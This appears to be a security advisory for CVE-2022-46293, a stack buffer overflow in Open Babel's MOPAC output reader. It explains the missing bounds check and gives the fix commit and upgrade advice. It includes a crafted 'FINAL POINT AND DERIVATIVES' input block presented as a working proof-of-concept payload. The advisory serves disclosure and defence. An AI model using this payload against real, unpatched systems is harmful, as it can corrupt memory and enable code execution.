high · 7.8CVE-2022-46293Jul 1, 2026

CVE-2022-46293: Open Babel MOPAC Output Parser Stack Buffer Overflow

Shubham Kandhare
Security Engagement Manager, SecureLayer7

Open Babel's MOPAC output reader lets an attacker overflow a fixed-size stack array by placing more than three translation-vector triplets in a crafted 'FINAL POINT AND DERIVATIVES' block, which can l

Packageopenbabel
Ecosystempip
Affected< 3.2.0
Fixed in3.2.0

The problem

The MOPAC output format reader in `mopacformat.cpp` parses translation vectors from the 'FINAL POINT AND DERIVATIVES' section into a fixed-size stack array `translationVectors[3]`.

The reading loop continued as long as each line carried 8 tokens and the atom name was `Tv`, with no check on how many vectors had already been stored. Feeding four or more complete X/Y/Z triplets writes past the end of the array, corrupting adjacent stack memory.

On a vulnerable build this is a stack-buffer-overflow that can reach arbitrary code execution.

Proof of concept

A working proof-of-concept for CVE-2022-46293 in openbabel, with the exact payload below.

text
 FINAL POINT AND DERIVATIVES

          ATOM    CHEMICAL    BOND       BOND
         NUMBER    SYMBOL    LENGTH     ANGLE
    1       Tv    X    0    1.000000    0.0
    2       Tv    Y    0    0.000000    0.0
    3       Tv    Z    0    0.000000    0.0
    4       Tv    X    0    0.000000    0.0
    5       Tv    Y    0    1.000000    0.0
    6       Tv    Z    0    0.000000    0.0
    7       Tv    X    0    0.000000    0.0
    8       Tv    Y    0    0.000000    0.0
    9       Tv    Z    0    1.000000    0.0
   10       Tv    X    0    0.000000    0.0
   11       Tv    Y    0    0.000000    0.0
   12       Tv    Z    0    1.000000    0.0

The TALOS advisory reproduces the exact loop: every line with 8 tokens where token[2] is `Tv` and token[4] is `Z` triggers `translationVectors[numTranslationVectors++].Set(x, y, z)`. Because `numTranslationVectors` is never capped, a fourth Z-row writes 24 bytes past the 3-element stack array (CWE-787 / CWE-119).

The same copy-pasted pattern affected five code paths across MSI, MOPAC (two issues), MOPAC Cartesian, and Gaussian formats. Commit 40e85213 adds a `numTranslationVectors < 3` guard before every `translationVectors[numTranslationVectors++].Set(...)` call, stopping the loop once the array is full.

The fix

Upgrade to Open Babel 3.2.0 (released 2026-05-26), which contains the fix commit 40e852138f21d586b7ccdce6329e7b23a87168bb. The patch adds an upper-bound check (`numTranslationVectors < 3`) before every write into `translationVectors[]` across all affected format parsers.

If upgrading immediately is not possible, avoid passing untrusted MOPAC output files to `obabel` or any application using `OBConversion`.

Reported by Cisco Talos.

References: [1][2][3][4][5][6]

Related research